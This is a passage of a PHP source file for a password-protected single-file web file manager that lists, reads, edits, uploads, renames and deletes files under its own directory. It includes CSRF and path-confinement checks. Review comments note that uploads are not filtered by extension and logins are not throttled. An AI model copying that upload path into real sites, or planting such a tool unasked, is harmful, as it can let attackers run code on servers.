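cwd = $_SESSION['sys_cwd'] ?? __DIR__; if (!is_dir($this->cwd)) $this->cwd = __DIR__; }

    /**
     * Emit a JSON response and terminate the request.
     *
     * Every response carries the current working directory and the session's
     * CSRF token so the client never has to ask for them separately.
     *
     * @param string $status  'ok' or 'error'
     * @param string $message human-readable detail (may be empty)
     * @param array  $data    action-specific payload
     */
    private function sendJSON(string $status, string $message = '', array $data = [])
    {
        header('Content-Type: application/json');
        // Responses contain file contents and the CSRF token: forbid sniffing and caching.
        header('X-Content-Type-Options: nosniff');
        header('Cache-Control: no-store');
        // PARTIAL_OUTPUT: a file that is not valid UTF-8 must not turn the whole body into an empty string.
        echo json_encode([
            'status'  => $status,
            'message' => $message,
            'data'    => $data,
            'cwd'     => $this->cwd,
            'csrf'    => $_SESSION['csrf_token'] ?? '',
        ], JSON_PARTIAL_OUTPUT_ON_ERROR);
        exit;
    }

    /** Abort with an error response unless the session was authenticated by a successful 'login'. */
    private function checkAuth()
    {
        if (($_SESSION['sys_auth'] ?? null) !== true) {
            $this->sendJSON('error', 'Unauthorized');
        }
    }

    /**
     * Abort with an error response unless $token equals the session's CSRF token.
     *
     * hash_equals() keeps the comparison constant-time; an empty session token
     * (no login yet) never matches.
     */
    private function validateCSRF(string $token)
    {
        $expected = $_SESSION['csrf_token'] ?? '';
        if (!is_string($expected) || $expected === '' || !hash_equals($expected, $token)) {
            $this->sendJSON('error', 'Invalid Security Token');
        }
    }

    /**
     * Directory this API is allowed to touch: the script's own directory, the
     * same fallback the constructor uses for the working directory.
     */
    private function managedRoot(): string
    {
        $root = realpath(__DIR__);
        return $root === false ? __DIR__ : $root;
    }

    /**
     * True when $path exists and, after symlink/'..' resolution, lies inside the managed root.
     * A link that points outside the root is rejected because realpath() follows it.
     */
    private function isManagedPath(string $path): bool
    {
        if ($path === '' || strpos($path, "\0") !== false) {
            return false;
        }
        $resolved = realpath($path);
        if ($resolved === false) {
            return false;
        }
        $root   = $this->managedRoot();
        $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
        return $resolved === $root || strncmp($resolved, $prefix, strlen($prefix)) === 0;
    }

    /** Canonical path of an existing directory inside the root, or '' when it is missing or outside. */
    private function managedDir(string $dir): string
    {
        if (!is_dir($dir) || !$this->isManagedPath($dir)) {
            return '';
        }
        return (string) realpath($dir);
    }

    /** Reduce a client-supplied name to a single path component; '' means "refuse". */
    private function safeName(string $name): string
    {
        if (strpos($name, "\0") !== false) {
            return '';
        }
        $name = basename($name);
        if ($name === '' || $name === '.' || $name === '..') {
            return '';
        }
        return $name;
    }

    /**
     * Read a scalar field from decoded input as a string; non-scalars and
     * strings containing NUL bytes (which filesystem calls reject) become ''.
     */
    private function inputString(array $input, string $key): string
    {
        $value = $input[$key] ?? '';
        if (!is_scalar($value)) {
            return '';
        }
        $value = (string) $value;
        return strpos($value, "\0") === false ? $value : '';
    }

    /**
     * Store one multipart upload in the current working directory.
     *
     * @param array $file one entry of $_FILES
     */
    private function handleUpload(array $file)
    {
        $this->checkAuth();
        $this->validateCSRF($this->inputString($_POST, 'csrf'));
        // A truncated or failed upload still has a tmp_name; trust only UPLOAD_ERR_OK.
        if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
            $this->sendJSON('error', 'Upload failed. Check file size limits.');
        }
        $dir  = $this->managedDir($this->cwd);
        $name = $this->safeName((string) ($file['name'] ?? ''));
        if ($dir === '' || $name === '') {
            $this->sendJSON('error', 'Invalid file name');
        }
        // NOTE(review): nothing filters by extension or content. If the managed root is served by
        // the web server, an uploaded script becomes executable; keep the root outside the
        // document root or add an allowlist before exposing this beyond trusted users.
        $target = $dir . DIRECTORY_SEPARATOR . $name;
        if (move_uploaded_file((string) ($file['tmp_name'] ?? ''), $target)) {
            $this->sendJSON('ok', 'File uploaded successfully');
        }
        $this->sendJSON('error', 'Upload failed. Check permissions.');
    }

    /**
     * Dispatch the incoming request.
     *
     * Multipart POSTs are uploads; a JSON body selects an action. Anything
     * else returns so the caller can render the HTML page. Every action except
     * 'login' requires an authenticated session and a valid CSRF token, and
     * every path is confined to the managed root.
     */
    public function handleRequest()
    {
        // A stale session may point outside the root or at a deleted folder; reset rather than trust it.
        if (!$this->isManagedPath($this->cwd)) {
            $this->cwd = $this->managedRoot();
            $_SESSION['sys_cwd'] = $this->cwd;
        }
        $method = $_SERVER['REQUEST_METHOD'] ?? 'GET';

        // 1. File upload (multipart/form-data) - the standard browser method.
        if ($method === 'POST' && isset($_FILES['file']) && is_array($_FILES['file'])) {
            $this->handleUpload($_FILES['file']);
        }

        // 2. JSON commands (login, list, read, save, ...). A plain GET falls through to the HTML below.
        $input = json_decode((string) file_get_contents('php://input'), true);
        if (!is_array($input)) {
            return;
        }
        $action = $this->inputString($input, 'action');

        // Everything except login requires auth. The token is required, not optional:
        // skipping the check when the field is absent would make CSRF trivially bypassable.
        if ($action !== 'login') {
            $this->checkAuth();
            $this->validateCSRF($this->inputString($input, 'csrf'));
        }

        switch ($action) {
            case 'login':
                // Constant-time compare so response timing does not leak how much of the key matched.
                if (hash_equals((string) ACCESS_PASS, $this->inputString($input, 'key'))) {
                    // Fresh session id on privilege change (session fixation).
                    session_regenerate_id(true);
                    $_SESSION['sys_auth']   = true;
                    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
                    $this->sendJSON('ok', 'Authorized', ['token' => $_SESSION['csrf_token']]);
                }
                // NOTE(review): no throttling or lockout on failed attempts; rate-limit at the web server or add a counter.
                $this->sendJSON('error', 'Invalid credentials');
                break;

            case 'list':
                $requested = isset($input['path']) ? $this->inputString($input, 'path') : $this->cwd;
                $dir = $this->managedDir($requested);
                if ($dir !== '') {
                    $this->cwd = $dir;
                    $_SESSION['sys_cwd'] = $dir;
                    $this->sendJSON('ok', '', $this->scanDir($dir));
                }
                $this->sendJSON('error', 'Directory not found');
                break;

            case 'read':
                $file = $this->inputString($input, 'file');
                if (is_file($file) && $this->isManagedPath($file)) {
                    // Content goes as plain text (JSON escaping is enough); cap the size so huge files are not loaded.
                    if (filesize($file) > 1024 * 1024) {
                        $this->sendJSON('error', 'File too large to edit online');
                    }
                    $content = file_get_contents($file);
                    if ($content === false) {
                        $this->sendJSON('error', 'File could not be read');
                    }
                    $this->sendJSON('ok', '', ['content' => $content]);
                }
                $this->sendJSON('error', 'File not found');
                break;

            case 'save':
                $file = $this->inputString($input, 'file');
                $dir  = $this->managedDir(dirname($file));
                $name = $this->safeName(basename($file));
                // Writing through a symlink could land outside the root, so links are refused.
                if ($dir === '' || $name === '' || is_link($dir . DIRECTORY_SEPARATOR . $name)) {
                    $this->sendJSON('error', 'Permission denied');
                }
                // '@': a warning here would corrupt the JSON body; the return value is checked instead.
                $written = @file_put_contents($dir . DIRECTORY_SEPARATOR . $name, $this->inputString($input, 'content'));
                if ($written === false) {
                    $this->sendJSON('error', 'Permission denied');
                }
                $this->sendJSON('ok', 'File saved');
                break;

            case 'rename':
                $old     = $this->inputString($input, 'old');
                $dir     = $this->managedDir(dirname($old));
                $oldName = $this->safeName(basename($old));
                // The new name is reduced to one component so it cannot move the entry to another directory.
                $newName = $this->safeName($this->inputString($input, 'new'));
                if ($dir === '' || $oldName === '' || $newName === '') {
                    $this->sendJSON('error', 'Rename failed');
                }
                $target = $dir . DIRECTORY_SEPARATOR . $newName;
                if (file_exists($target) || is_link($target)) {
                    $this->sendJSON('error', 'Target already exists');
                }
                if (@rename($dir . DIRECTORY_SEPARATOR . $oldName, $target)) {
                    $this->sendJSON('ok', 'Renamed');
                }
                $this->sendJSON('error', 'Rename failed');
                break;

            case 'delete':
                $path = $this->inputString($input, 'path');
                $dir  = $this->managedDir(dirname($path));
                $name = $this->safeName(basename($path));
                // The root itself has no managed parent, so it can never be deleted here.
                if ($dir === '' || $name === '' || !$this->deleteRecursive($dir . DIRECTORY_SEPARATOR . $name)) {
                    $this->sendJSON('error', 'Delete failed');
                }
                $this->sendJSON('ok', 'Deleted');
                break;

            case 'mkdir':
                $dir  = $this->managedDir($this->cwd);
                $name = $this->safeName($this->inputString($input, 'name'));
                // '@': a warning here would corrupt the JSON body; the return value is checked instead.
                if ($dir !== '' && $name !== '' && @mkdir($dir . DIRECTORY_SEPARATOR . $name)) {
                    $this->sendJSON('ok', 'Folder created');
                }
                $this->sendJSON('error', 'Failed to create folder');
                break;

            default:
                $this->sendJSON('error', 'Unknown action');
        }
    }

    /**
     * List a directory as two lists, 'folders' and 'files', each entry holding
     * name, full path, formatted size ('-' for folders) and octal permissions.
     *
     * @return array{folders: array, files: array}
     */
    private function scanDir(string $dir): array
    {
        $result = ['folders' => [], 'files' => []];
        // '@': a warning here would corrupt the JSON body; the false return is handled.
        $entries = @scandir($dir);
        if ($entries === false) {
            return $result;
        }
        foreach ($entries as $name) {
            if ($name === '.' || $name === '..') {
                continue;
            }
            $path  = $dir . DIRECTORY_SEPARATOR . $name;
            $perms = @fileperms($path); // false for e.g. a dangling symlink
            $info  = [
                'name'  => $name,
                'path'  => $path,
                'size'  => is_file($path) ? $this->formatSize(@filesize($path)) : '-',
                'perms' => $perms === false ? '-' : substr(sprintf('%o', $perms), -4),
            ];
            if (is_dir($path)) {
                $result['folders'][] = $info;
            } else {
                $result['files'][] = $info;
            }
        }
        return $result;
    }

    /**
     * Human-readable size with two decimals, e.g. "1.50 MB".
     *
     * @param int|false $bytes raw byte count; false (a failed filesize()) is shown as 0
     */
    private function formatSize($bytes): string
    {
        $units = ['B', 'KB', 'MB', 'GB', 'TB'];
        $bytes = max(0, (int) $bytes);
        $power = $bytes > 0 ? (int) floor(log($bytes, 1024)) : 0;
        // Clamp so a very large file cannot index past the last unit.
        $power = min($power, count($units) - 1);
        return number_format($bytes / pow(1024, $power), 2, '.', ',') . ' ' . $units[$power];
    }

    /**
     * Remove a file, a link, or a directory tree. Returns false if anything could not be removed.
     *
     * Links are unlinked, never followed: recursing into a linked directory
     * would delete the contents of its target.
     */
    private function deleteRecursive(string $path): bool
    {
        if (is_link($path)) {
            return unlink($path);
        }
        if (is_dir($path)) {
            $entries = scandir($path);
            if ($entries === false) {
                return false;
            }
            $allRemoved = true;
            foreach (array_diff($entries, ['.', '..']) as $entry) {
                $allRemoved = $this->deleteRecursive($path . DIRECTORY_SEPARATOR . $entry) && $allRemoved;
            }
            return $allRemoved && rmdir($path);
        }
        if (is_file($path)) {
            return unlink($path);
        }
        return false;
    }
}

$api = new FileManagerAPI();
$api->handleRequest();

// Session check (login screen vs app screen)
if (!isset($_SESSION['sys_auth'])) { ?> System Auth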

Authentication

File Manager v4
...
NameSizePermsActions

Login

Login
Scroll to Top